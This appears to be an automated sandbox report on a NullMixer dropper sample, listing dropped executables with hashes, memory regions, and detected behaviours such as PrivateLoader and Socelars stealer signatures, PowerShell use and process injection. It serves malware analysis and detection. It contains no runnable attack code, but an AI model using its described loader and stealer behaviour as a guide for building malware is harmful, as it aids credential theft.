SHA512 24c5808384fdb0ab8fe0b8b9e6a7fef6db39071c655f7dc6399aedf24d1e005a67e5285f752be29966de9078e47cf97427c67473fb88e0e78280b3d578a5e774

\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe

MD5 7d7f14a1b3b8ee4e148e82b9c2f28aed
SHA1 649a29887915908dfba6bbcdaed2108511776b5a
SHA256 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb
SHA512 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3

memory/2692-104-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2692-103-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe

MD5 cd6d011a663a12f81ba8e4e5407e3a6f
SHA1 53c81876f0ff422d41f19c6d2ea0d30548e4e071
SHA256 c303cb56a1c37e081b25cfec6b61829205cdd473deafed698bf725ca55a5b7a1
SHA512 8b3228f725a3f49ab34bd36f09589ce682d1115acd212f9b6818708d59b263d9b83ec8e475f917df349449d5126a06ac1a55063f2946842639c0194412482738

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe

MD5 c7cd0def6982f7b281c6a61d29eec4be
SHA1 f9f600d70d60cf79563e84cec0b883fa3f541690
SHA256 b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
SHA512 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe

MD5 8268aa1cba3763a79c3dd333ab42c093
SHA1 e7d034e6f55bc07b38ad50f5bb2e83f098c60c97
SHA256 7f6eef3d7d271decfd078c27b125d8c06dcd3a920f0e9edf8edf229ee1b2012f
SHA512 271797ad106169e7bbed9b70187d8b643ed7d164b7ed0049d3656334899ccb1bd19e4a4ec2fab9d5f00cad718a5248cf78ac976d9c032665d6758a2f8dd91195

\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

memory/1440-137-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2692-105-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe

MD5 b33a3fb6b491b328dacaf18c302b20de
SHA1 41281e81ec9ba49af4af18f3c61038e62818d3c6
SHA256 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72
SHA512 a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe

MD5 343befc915e3428791029f5f314393b9
SHA1 47701bb5f2f8b6c5135abccec790378c3986f555
SHA256 4ca6bf1db2cb7f2f8799180ee8a56c2d96f718484a4ee3e06e32aebe6897c1da
SHA512 9381340ccad3ac5ce239908b3f90cd32ee1b835510d8ecc17b72049a49bb6613ed246d955d0a65f4970735f8cabcfd9af93417034a405d00ef193975cd1b2e5e

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe

MD5 3476b903e6e6ff5f246460e8749fd232
SHA1 3639e6c1f104ad7aa24ab7f72aca5dad686361cf
SHA256 25cbf20f43b95afac49543b0dd5378626ab2c78f5edadd781441b335f9fc1002
SHA512 ac99a88b90e1396b2a8db98e56eb350ad95a8f8faa5b7b36862f603899aa9a8bd2a69d5abf3346158c6605f3475b4ab3366c644c7ab23dd5e436cc8951d0e026

\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

memory/2136-141-0x0000000001200000-0x0000000001226000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2G7PIUG5SR263X945YGX.temp

MD5 237e86d133f57b8f0e5c235b90165404
SHA1 097e472cb0ade2c1a953b898a89640b76f26d939
SHA256 d9ed6170cd22685a9cf2f8c896ea92943eb60f3884b9d5fbee1cbd83301e8666
SHA512 0da7db83f8102dc6ce24acc32d99bbe06a1e8e36b19ab0b0c144a38315c5537d6cbce87af8f92f51d5b6fa32ebfb3fb8369a704d31fb0deaf5f5e8a8bf4d3a81

memory/1048-148-0x00000000028D0000-0x0000000002FC5000-memory.dmp

memory/1416-149-0x0000000000400000-0x0000000000AF5000-memory.dmp

memory/1772-150-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/3028-140-0x0000000000800000-0x0000000000808000-memory.dmp

memory/1416-152-0x0000000001260000-0x0000000001955000-memory.dmp

memory/1416-153-0x0000000001260000-0x0000000001955000-memory.dmp

memory/1996-156-0x0000000000380000-0x00000000003E8000-memory.dmp

memory/1384-157-0x00000000002D0000-0x0000000000338000-memory.dmp

memory/2136-168-0x0000000000440000-0x0000000000446000-memory.dmp

memory/2028-169-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1680-171-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1672-172-0x0000000004F20000-0x000000000532F000-memory.dmp

memory/1440-177-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2692-102-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2692-100-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2692-96-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-BLA5Q.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/1416-189-0x0000000000400000-0x0000000000AF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-BLA5Q.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe

MD5 1fd5c6ee4e5c6af11015087d8d6af3b0
SHA1 21aef092eb546d508740185e38b52896fb6aea5d
SHA256 d41f88572be0063290efe714d45528ba9d467ac89e066d88f13e13a7325bc663
SHA512 5074aafa3d7030713940aa9436b1c96fdef2e7df52c68f5d97203fe0ec3af7055934e6b6cac5ba95c69310e037863b16759b1f475c4e42ab61e9acb7ed387975

memory/2136-191-0x0000000000460000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe

MD5 3bb8763cc667a751d1653cc3634f1f83
SHA1 d2e0dc47a6085864ec65ec0fa326b4434bd7f376
SHA256 f369798e25e4c2dd109caf27fb399d2f32200e07a5550fdb48816daaa5563843
SHA512 1c5800e5b80775f33ad55a13418c039b3c56b8e532ccf8d5895c5a4e904731f76104ff6469075d093f39c902364bb8c19d048a3a4aa6b2893e03ebc4e41f160e

memory/2136-192-0x0000000000470000-0x0000000000476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe

MD5 5cd1e88d510f00080fecc9d52fb97ba3
SHA1 c2d8521c2ec33026df1f07a0214b422ce12f702d
SHA256 f22839eb0904705653bdfcd8c144867c3c02ab09096614652280d4d1c323e470
SHA512 d2207c819f028843b416e857e9dc47fa3b553f5c9955bf0ffc6dbb6e05e75cc85b5b133cc86c373182dc00f16111b6d51cfd67698c9a699ae866497ddc75a195

memory/1416-197-0x0000000000D40000-0x0000000000D41000-memory.dmp

memory/1416-220-0x0000000003C80000-0x0000000003C81000-memory.dmp

memory/1416-222-0x0000000003C80000-0x0000000003C81000-memory.dmp

memory/1416-217-0x0000000003000000-0x0000000003001000-memory.dmp

memory/1416-223-0x0000000000400000-0x0000000000AF5000-memory.dmp

memory/1416-215-0x0000000003000000-0x0000000003001000-memory.dmp

memory/1416-212-0x0000000002F50000-0x0000000002F51000-memory.dmp

memory/1416-210-0x0000000002F50000-0x0000000002F51000-memory.dmp

memory/1416-207-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

memory/1416-205-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

memory/1416-202-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

memory/1416-200-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

memory/1416-198-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

memory/1416-195-0x0000000000D40000-0x0000000000D41000-memory.dmp

memory/1416-193-0x0000000000D40000-0x0000000000D41000-memory.dmp

memory/448-226-0x0000000000400000-0x0000000002B41000-memory.dmp

memory/608-241-0x0000000002930000-0x0000000002DEE000-memory.dmp

memory/608-243-0x0000000002EF0000-0x0000000002F9E000-memory.dmp

memory/2924-256-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2884-269-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2924-246-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2924-244-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1048-278-0x00000000028D0000-0x0000000002FC5000-memory.dmp

memory/1416-279-0x0000000000400000-0x0000000000AF5000-memory.dmp

memory/1416-280-0x0000000001260000-0x0000000001955000-memory.dmp

memory/3044-310-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Program Files (x86)\Gparted\Build.exe

MD5 c874508845d1c0bb486f5e41af8de480
SHA1 3ac7e246934ba74c1018d50138bea77b035d6f90
SHA256 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be
SHA512 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758

memory/2172-352-0x0000000000570000-0x0000000000578000-memory.dmp

memory/2172-350-0x0000000000BD0000-0x0000000000BF2000-memory.dmp

C:\Program Files (x86)\Gparted\gimagex.exe

MD5 85199ea4a530756b743ad4491ea84a44
SHA1 0842cd749986d65d400a9605d17d2ed7a59c13cc
SHA256 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa
SHA512 b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\56ZKHKVYOPUXMOMP5SR3.temp

MD5 677b8bc16975a2d8f4d553257c6f89e1
SHA1 e7f5c2a612f74f743ce3e0bc6be1921766d8e8b5
SHA256 f22d2ca8ab0c494a77a9e691a0541daf51c7d3e4de134fc27ef095983412575c
SHA512 67b07b3b1d019a4ef96afe4ebfbda635a73d05a78d506b27f98b89287793105c25a87e8e27d81128a49d66f5f97ce5b6ef91d5e1897cb0998cc31c9ab302e2d0

memory/1912-395-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/1912-407-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab38BC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar38DF.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 21:27

Reported

2024-11-09 21:30

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4408 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe
PID 4408 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe
PID 4408 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe
PID 4620 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4620 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
